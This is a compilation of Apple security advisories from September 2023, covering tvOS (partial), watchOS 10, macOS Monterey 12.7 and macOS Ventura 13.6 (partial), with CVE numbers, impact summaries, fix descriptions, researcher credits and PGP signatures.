Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Simulator  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-40419: Arsenii Kostromin (0x3c3e)

StorageKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong  
Kim(@nevul37)

Additional recognition

Airport  
We would like to acknowledge Adam M., and Noah Roskin-Frazee and  
Professor Jason Lau (ZeroClicks.ai Lab) for their assistance.

AppSandbox  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.

Audio  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Bluetooth  
We would like to acknowledge Jianjun Dai and Guang Gong of 360  
Vulnerability Research Institute for their assistance.

Control Center  
We would like to acknowledge Chester van den Bogaard for their  
assistance.

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School and Maddie Stone of Google's Threat  
Analysis Group, 永超 王 for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge an anonymous researcher for their  
assistance.

libxslt  
We would like to acknowledge Dohyun Lee (@l33d0hyun) of PK Security,  
OSS-Fuzz, and Ned Williamson of Google Project Zero for their  
assistance.

NSURL  
We would like to acknowledge Zhanpeng Zhao (行之) and 糖豆爸爸(@晴天组织) for  
their assistance.

Photos  
We would like to acknowledge Dawid Pałuska and Kirin (@Pwnrin) for their  
assistance.

Photos Storage  
We would like to acknowledge Wojciech Regula of SecuRing  
(wojciechregula.blog) for their assistance.

Power Services  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Shortcuts  
We would like to acknowledge Alfie Cockell Gwinnett, Christian Basting  
of Bundesamt für Sicherheit in der Informationstechnik, Cristian Dinca  
of "Tudor Vianu" National High School of Computer Science, Romania,  
Giorgos Christodoulidis, Jubaer Alnazi of TRS Group Of Companies,  
KRISHAN KANT DWIVEDI, and Matthew Butler for their assistance.

Software Update  
We would like to acknowledge Omar Siman for their assistance.

Spotlight  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal, and Dawid Pałuska for their  
assistance.

StorageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance. 

WebKit  
We would like to acknowledge Khiem Tran, Narendra Bhati From Suma Soft  
Pvt. Ltd, and an anonymous researcher for their assistance.

Wi-Fi  
We would like to acknowledge Wang Yu of Cyberserval for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJoACgkQX+5d1TXa  
IvpJvw/+OKqntqggqPkx4TXqH+nCchp4wj3KCjmdtULgoYL2BStw+jXAl9Z/Wnyi  
uhg7YgboJb+jFc2UbYNG/w6Ks4qnh1P/4xwd8KfiGH+u0pblR24DDyNOPA6X+F4c  
CJ2jfagKi7xOM/Djm0mkrkZ1PeiXkx5k4bBLL+I8ckadCZinecn0tZur0gwAzN/y  
e113vKgGJDvVn257inJ063d7d+R4gdDNznMq4Mg5+gtbWoz9OZ6gHiTj+u8jwrlh  
+10ZOBtTHGQ612OptUB2FcyLn439CQhftHlc91L5Am2HsduesB6MBmtiZlfFMaca  
P8Vur6sh/k34roqaWVW2ljvMkqZMJSocTgjzMsVN87itikXT9ua5HbcInnkCMx+A  
8gtOnogY/lsm446Qu0mH0MYAZLSbQ9OYzJor9fax9PV+ysmOGn2SfM2o6DKPXjCE  
74+yFAiv+lo3yrr68SQea/PiDxhMt7+i/Ia7vO5gg1HkqANFc0//KC2pObdGSNu6  
cWJQUcGqOvU/jqnIO9WLXRnSDdXsRGLJ8xXSAYL8M2FdW5Md/tvQ3/p+/6kwXfnq  
cXwM/92G0mx1GFeapToP0NCjUwx4ARCw9d1Y+5keZ4gRaVOJzy/96WKzbc5blVGH  
C5RT/4ty1vpgbCcI8kmDt0WD2nvTnwoNgBaEti/iC3Lzu+M52wA=  
=Zq9i  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-26-2023-9

Apple Security Advisory 09-26-2023-8 - watchOS 10 addresses bypass, code execution, out of bounds read, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-8 watchOS 10

watchOS 10 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213937.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

App Store  
Available for: Apple Watch Series 4 and later  
Impact: A remote attacker may be able to break out of Web Content  
sandbox  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-40448: w0wbox

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40432: Mohamed GHANNAM (@_simo36)  
CVE-2023-41174: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40399: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

AuthKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

Bluetooth  
Available for: Apple Watch Series 4 and later  
Impact: An attacker in physical proximity can cause a limited out of  
bounds write  
Description: The issue was addressed with improved checks.  
CVE-2023-35984: zer0k

bootp  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau  
(ZeroClicks.ai Lab)

CFNetwork  
Available for: Apple Watch Series 4 and later  
Impact: An app may fail to enforce App Transport Security  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-38596: Will Brattain at Trail of Bits

CoreAnimation  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Dev Tools  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2023-32396: Mickey Jin (@patch1t)

Game Center  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with improved validation.  
CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

libpcap  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2023-40400: Sei K.

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxslt  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)

MobileStorageMounter  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-41068: Mickey Jin (@patch1t)

Passcode  
Available for: Apple Watch Ultra (all models)  
Impact: An Apple Watch Ultra may not lock when using the Depth app  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-40418: serkan Gurbuz

Photos Storage  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access edited photos saved to a temporary  
directory  
Description: The issue was addressed with improved checks.  
CVE-2023-40456: Kirin (@Pwnrin)  
CVE-2023-40520: Kirin (@Pwnrin)

Safari  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to identify what other apps a user has  
installed  
Description: The issue was addressed with improved checks.  
CVE-2023-35990: Adriatik Raci of Sentry Cybersecurity

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to UI  
spoofing  
Description: A window management issue was addressed with improved state  
management.  
CVE-2023-40417: Narendra Bhati From Suma Soft Pvt. Ltd.

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Share Sheet  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive data logged when a user  
shares a link  
Description: A logic issue was addressed with improved checks.  
CVE-2023-41070: Kirin (@Pwnrin)

Simulator  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to gain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-40419: Arsenii Kostromin (0x3c3e)

StorageKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t) and James Hutchins

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-40424: Arsenii Kostromin (0x3c3e), Joshua Jewett  
(@JoshJewett33), and Csaba Fitzl (@theevilbit) of Offensive Security

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 249451  
CVE-2023-39434: Francisco Alonso (@revskills), and Dohyun Lee  
(@l33d0hyun) of PK Security

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong  
Kim(@nevul37)

Additional recognition

Airport  
We would like to acknowledge Adam M., and Noah Roskin-Frazee and  
Professor Jason Lau (ZeroClicks.ai Lab) for their assistance.

Audio  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Bluetooth  
We would like to acknowledge Jianjun Dai and Guang Gong of 360  
Vulnerability Research Institute for their assistance.

Books  
We would like to acknowledge Aapo Oksman of Nixu Cybersecurity for their  
assistance.

Control Center  
We would like to acknowledge Chester van den Bogaard for their  
assistance.

Data Detectors UI  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal for their assistance.

Find My  
We would like to acknowledge Cher Scarlett for their assistance.

Home  
We would like to acknowledge Jake Derouin (jakederouin.com) for their  
assistance.

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School, Maddie Stone of Google's Threat  
Analysis Group, and 永超 王 for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.

libxpc  
We would like to acknowledge an anonymous researcher for their  
assistance.

libxslt  
We would like to acknowledge Dohyun Lee (@l33d0hyun) of PK Security,  
OSS-Fuzz, and Ned Williamson of Google Project Zero for their  
assistance.

NSURL  
We would like to acknowledge Zhanpeng Zhao (行之) and 糖豆爸爸(@晴天组织) for  
their assistance.

Photos  
We would like to acknowledge Dawid Pałuska and Kirin (@Pwnrin) for their  
assistance.

Photos Storage  
We would like to acknowledge Wojciech Regula of SecuRing  
(wojciechregula.blog) for their assistance.

Power Services  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Shortcuts  
We would like to acknowledge Alfie Cockell Gwinnett, Christian Basting  
of Bundesamt für Sicherheit in der Informationstechnik, Cristian Dinca  
of "Tudor Vianu" National High School of Computer Science, Romania,  
Giorgos Christodoulidis, Jubaer Alnazi of TRS Group Of Companies,  
KRISHAN KANT DWIVEDI, and Matthew Butler for their assistance.

Software Update  
We would like to acknowledge Omar Siman for their assistance.

StorageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

WebKit  
We would like to acknowledge Khiem Tran, Narendra Bhati From Suma Soft  
Pvt. Ltd, and an anonymous researcher for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJkACgkQX+5d1TXa  
Ivo3WhAA1an2sh+qEnBj7zKhCx64vpUB3B6ET0lh+vMjHwu3Z7ThtdEnjwUgs1SA  
5zzj3Jsf8Zb/ivyQ+jfI5IyUZxCT+sWn3t3CHN4jb1LTsxL/h9mrP42U01GTooju  
erIvHarH2gk/Qew99cPPok7MpyNVPmRfJ3juEIZOe4CjsKLsWz6HRsiIQE/nvMta  
NUIiF6/VTzdynDEFlK7iUWS31N2nN3pLhUFwOdKz1t1lCKpWBYsSPPms6nmFLeWJ  
3rfyDPzupAQxfhldfgdBpQvYzYiDpqRNUBrFJCKG8BaKpv87AZI7NKgNv4WYNWP9  
0P3IIIAvGVpCmNcjGl18K9hiigXfs+U0QPA6DD2O2hnsUmiUbLnEc4BpkK5KO+y1  
uteIDhV8IsN4n86h9IGY2nImJtbUSADhsIRkwdbI8Z80q4zLYteKuj83FztVgSx2  
/C382yyFqMZA8DnSy+CNbCp5AsHOPAgeC+sTvnLlPfPAyJMMSyoQk8S1ARx6fqog  
TEu8GPqOWjyol8gKTTnEqufLF+lmJbNxxAKLXt7rhpiy8Bl4GUYIooKta32MshVU  
fsoujI+xVfsGwev0QZIPa+ElCMj8r2GhHqBZ+ceifRhMPBJ/UcnP6Y+ekg26pVnI  
CbJ+Aj4WU3KKRdpKWP6TT8eIOq6tvYYMJKCylCVKFeEGkpB7sEE=  
=TnBb  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-26-2023-8

Apple Security Advisory 09-26-2023-5 - macOS Monterey 12.7 addresses code execution and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-5 Additional information for APPLE-SA-2023-09-21-7 macOS Monterey 12.7

macOS Monterey 12.7 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213932.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
Entry added September 26, 2023

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai  
Entry added September 26, 2023

Biometric Authentication  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-41232: Liang Wei of PixiePoint Security  
Entry added September 26, 2023

ColorSync  
Available for: macOS Monterey  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-40406: JeongOhKyea of Theori  
Entry added September 26, 2023

CoreAnimation  
Available for: macOS Monterey  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic  
Entry added September 26, 2023

Disk Management  
Available for: macOS Monterey  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t) and James Hutchins  
Entry added September 26, 2023

Game Center  
Available for: macOS Monterey  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security  
Entry added September 26, 2023

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
Entry added September 26, 2023

Kernel  
Available for: macOS Monterey  
Impact: A local attacker may be able to elevate their privileges. Apple  
is aware of a report that this issue may have been actively exploited  
against versions of iOS before iOS 16.7.  
Description: The issue was addressed with improved checks.  
CVE-2023-41992: Bill Marczak of The Citizen Lab at The University of  
Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

libxpc  
Available for: macOS Monterey  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)  
Entry added September 26, 2023

libxpc  
Available for: macOS Monterey  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)  
Entry added September 26, 2023

libxslt  
Available for: macOS Monterey  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security  
Entry added September 26, 2023

Maps  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)  
Entry added September 26, 2023

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)  
Entry added September 26, 2023

Additional recognition

AppSandbox  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.  
Entry added September 26, 2023

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School and Maddie Stone of Google's Threat  
Analysis Group for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.  
Entry added September 26, 2023

WebKit  
We would like to acknowledge Khiem Tran, and Narendra Bhati From Suma  
Soft Pvt. Ltd, Pune (India) for their assistance.  
Entry added September 26, 2023

WebRTC  
We would like to acknowledge anonymous researcher for their assistance.  
Entry added September 26, 2023

macOS Monterey 12.7 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJgACgkQX+5d1TXa  
IvqcNQ/9GQlneQRhlET+3tkaIg7g0XJE+HkDOKOR/F5oi9yAkvpg5O+jAiwKq61E  
PXvBWN6b0dhrANcRswmEDF2SWVIbPLLnkne5F6XoA18SDVxOorUYXxdsXaOIVO3J  
Zssoxhc5cFLR41m8WqnJ2MqJHhPvjKAtFjqyUXiF/ZbBqrKtnYeiho+ueG/joDbb  
lMGf2AXUQQ5Zoc7J4EPgtlrBBXIeJobcRsFrYWnvimEADfyX87w7Idf5pfbrgmbu  
xy0B4742tPztEu7SvKpZzD9CqQU7Lpm+uK4JfiZjllkibe4sYyypyVptDGQRB08S  
WJ6zPXNA5Wm2F7Fjplx9m1qPqGen2kek5dBCT09QfqFwdnjp/tiAODmdHD+PYtdI  
ANoMRQ7J2i99mm8AtKpM279sNmF5byvpAYCJypJylmy0TRspvDfWv5ekfNutZ/iG  
JnTFck0V6j+a3VAKOvyDkP0kIpbEw4Efx7r9TBqcYJq+EkxZyRNlbqZyz21d7rpN  
aQKI5Q1hCZosOZt6ndeqsymJJatMsvFFV7QUKOyFYq9+WDaj1soOgeXQKcyX2LFN  
Iq7js+tS2t+r5A8t8tZEsEKfSObgOhX3gJhA81vbkVOM0NtqFHJj/YNBI16A16rz  
GNB6OtcLdc+omv5tu9g6WGGN7GVCspY4RmmnXnAJS2YKf1lZYAA=  
=bYk1  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-26-2023-5

Apple Security Advisory 09-26-2023-4 - macOS Ventura 13.6 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-4 Additional information for APPLE-SA-2023-09-21-6 macOS Ventura 13.6

macOS Ventura 13.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213931.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
Entry added September 26, 2023

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)  
Entry added September 26, 2023

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai  
Entry added September 26, 2023

Biometric Authentication  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-41232: Liang Wei of PixiePoint Security  
Entry added September 26, 2023

ColorSync  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-40406: JeongOhKyea of Theori  
Entry added September 26, 2023

CoreAnimation  
Available for: macOS Ventura  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic  
Entry added September 26, 2023

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
Entry added September 26, 2023

Kernel  
Available for: macOS Ventura  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)  
Entry added September 26, 2023

Kernel  
Available for: macOS Ventura  
Impact: A local attacker may be able to elevate their privileges. Apple  
is aware of a report that this issue may have been actively exploited  
against versions of iOS before iOS 16.7.  
Description: The issue was addressed with improved checks.  
CVE-2023-41992: Bill Marczak of The Citizen Lab at The University of  
Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)  
Entry added September 26, 2023

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)  
Entry added September 26, 2023

libxslt  
Available for: macOS Ventura  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security  
Entry added September 26, 2023

Maps  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)  
Entry added September 26, 2023

Pro Res  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41063: Certik Skyfall Team  
Entry added September 26, 2023

Sandbox  
Available for: macOS Ventura  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)  
Entry added September 26, 2023

Sandbox  
Available for: macOS Ventura  
Impact: Apps that fail verification checks may still launch  
Description: The issue was addressed with improved checks.  
CVE-2023-41996: Yiğit Can YILMAZ (@yilmazcanyigit) and Mickey Jin  
(@patch1t)  
Entry added September 26, 2023

Security  
Available for: macOS Ventura  
Impact: A malicious app may be able to bypass signature  
validation. Apple is aware of a report that this issue may have been  
actively exploited against versions of iOS before iOS 16.7.  
Description: A certificate validation issue was addressed.  
CVE-2023-41991: Bill Marczak of The Citizen Lab at The University of  
Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

Share Sheet  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive data logged when a user  
shares a link  
Description: A logic issue was addressed with improved checks.  
CVE-2023-41070: Kirin (@Pwnrin)  
Entry added September 26, 2023

StorageKit  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins  
Entry added September 26, 2023

Additional recognition

AppSandbox  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.  
Entry added September 26, 2023

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School and Maddie Stone of Google's Threat  
Analysis Group for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.  
Entry added September 26, 2023

WebKit  
We would like to acknowledge Khiem Tran, and Narendra Bhati From Suma  
Soft Pvt. Ltd, Pune (India) for their assistance.  
Entry added September 26, 2023

WebRTC  
We would like to acknowledge anonymous researcher for their assistance.  
Entry added September 26, 2023

macOS Ventura 13.6 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
